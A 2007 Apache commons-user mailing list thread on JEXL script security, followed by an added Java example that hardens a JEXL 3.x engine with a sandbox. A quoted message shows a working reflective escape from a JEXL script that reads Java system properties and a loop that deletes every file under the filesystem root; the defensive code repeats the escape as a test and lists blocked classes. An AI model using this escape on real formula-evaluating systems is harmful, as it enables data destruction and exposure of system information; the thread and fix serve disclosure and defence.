commons-user mailing list archives

From "Dion Gillard" <d...@trongus.com>
Subject Re: JEXL security issue with system properties
Date Fri, 26 Oct 2007 08:35:46 GMT
JEXL doesn't place any security restrictions on what you can do with
the script itself.


On 10/6/07, Trevor Harrison <trevorsharrison@gmail.com> wrote:
> Replying to myself:
>
> On 10/4/07, Trevor Harrison <trevorsharrison@gmail.com> wrote:
> > While looking for other ways to 'break' out, I started thinking about
> > classloaders.  I haven't succeeded in getting a classloader yet in a
> > script, but if I could, it would be bad for my intended usage of JEXL
> > (as a fairly secure way of executing user supplied formulas).
> >
> > // this doesn't work
> > cl = intClazz.getClassLoader();  // this fails, returns a null
>
> Well, still not sure why that method is returning a null for the
> classloader, but if I call (the much simpler) clazz.forName(), I can
> get a reference to a class:
>
> i = 0;
> intClazz = i.class;
> clazz = intClazz.forName("java.lang.System");
> m = clazz.getMethod("getProperties", null);
> p = m.invoke(null, null);
>
> which successfully gets me the system properties.  Which is probably
> the least of my worries, considering I could do something like:
>
> i = 0;
> intClazz = i.class;
> clazz = intClazz.forName("java.io.File");
> m = clazz.getMethod("listRoots", null);
> roots = m.invoke(null, null);
> files = roots[0].listFiles();
> foreach( file in files )
> {
>   file.delete();
> }
>
> ---------------------------------------------------------------------
> To unsubscribe, e-mail: user-unsubscribe@commons.apache.org
> For additional commands, e-mail: user-help@commons.apache.org
>
>


-- 
dIon Gillard
Rule #131 of Acquisition: Information is Profit.
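The thread shows that a JEXL script can reach `java.lang.Class` through the `.class` property of any value and from there use `forName`/`getMethod`/`invoke` to call anything on the classpath; the `null` the earlier message saw from `getClassLoader()` is simply how Java reports the bootstrap loader for core classes such as `Integer`, so it was never a barrier. The host that embeds the engine has to impose the restriction itself. The following is an added example, not code from this thread or from the JEXL project, and it assumes JEXL 3.x (the 2007 thread concerns JEXL 1.x); the class `SandboxedJexl`, the methods `buildEngine` and `run`, and the constants `ESCAPE_SCRIPT` and `FORMULA` are mine, and the formula and its inputs are constructed sample data. It blocks the reflection gateway classes in a `JexlSandbox` and runs the engine strict and non-silent so that a blocked member resolution surfaces as a `JexlException` instead of a silent `null`.

```java
// Added example (not from the thread or the JEXL project): a JEXL 3.x host that
// blocks the reflective escape shown above (i.class -> forName -> getMethod -> invoke).
// Assumes commons-jexl3 on the classpath; names and sample data are constructed.
import org.apache.commons.jexl3.JexlBuilder;
import org.apache.commons.jexl3.JexlContext;
import org.apache.commons.jexl3.JexlEngine;
import org.apache.commons.jexl3.JexlException;
import org.apache.commons.jexl3.JexlScript;
import org.apache.commons.jexl3.MapContext;
import org.apache.commons.jexl3.introspection.JexlSandbox;

public class SandboxedJexl {
    // The reflection chain from the thread, as a regression test for the sandbox.
    static final String ESCAPE_SCRIPT =
        "i = 0; intClazz = i.class; "
      + "clazz = intClazz.forName('java.lang.System'); "
      + "m = clazz.getMethod('getProperties', null); "
      + "m.invoke(null, null)";

    // A legitimate user-supplied formula of the kind the original poster wanted to run.
    static final String FORMULA = "price * quantity * (1 - discount)";

    static JexlEngine buildEngine() {
        // Default sandbox: classes not listed here stay accessible, the listed ones
        // have every property and method blocked (read, write and execute).
        JexlSandbox sandbox = new JexlSandbox();
        sandbox.black("java.lang.Class");          // forName, getMethod, getClassLoader ...
        sandbox.black("java.lang.ClassLoader");    // loadClass, defineClass ...
        sandbox.black("java.lang.reflect.Method"); // invoke
        sandbox.black("java.lang.System");         // belt and braces behind the Class block
        sandbox.black("java.lang.Runtime");
        sandbox.black("java.lang.ProcessBuilder");
        sandbox.black("java.io.File");
        return new JexlBuilder()
            .sandbox(sandbox)
            .strict(true)   // an unresolvable member throws instead of evaluating to null
            .silent(false)  // and the exception propagates to the host instead of being logged
            .create();
    }

    // Compile and execute one script against the given variables.
    static Object run(JexlEngine jexl, String source, JexlContext ctx) {
        JexlScript script = jexl.createScript(source);
        return script.execute(ctx);
    }

    public static void main(String[] args) {
        JexlEngine jexl = buildEngine();

        // Ordinary arithmetic on context variables is unaffected by the sandbox.
        JexlContext ctx = new MapContext();
        ctx.set("price", 10.0);
        ctx.set("quantity", 3);
        ctx.set("discount", 0.1);
        System.out.println("formula = " + run(jexl, FORMULA, ctx));

        // The escape chain stops at 'forName': java.lang.Class is blocked, and in strict
        // mode the unsolvable method is reported as a JexlException.
        try {
            Object props = run(jexl, ESCAPE_SCRIPT, new MapContext());
            System.out.println("ESCAPE SUCCEEDED, sandbox misconfigured: " + props);
        } catch (JexlException e) {
            System.out.println("blocked: " + e.getMessage());
        }
    }
}
```

The blacklist above is the minimal fix for the chain in the thread; a host that evaluates untrusted formulas is better served by the opposite shape, a sandbox that denies everything by default and whitelists only the few bean classes the formulas legitimately need, so that a class nobody thought to list cannot become the next gateway. Whichever shape is used, keep `strict(true)` and `silent(false)`: with lenient evaluation a blocked call quietly yields `null` and the failure is invisible in logs.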
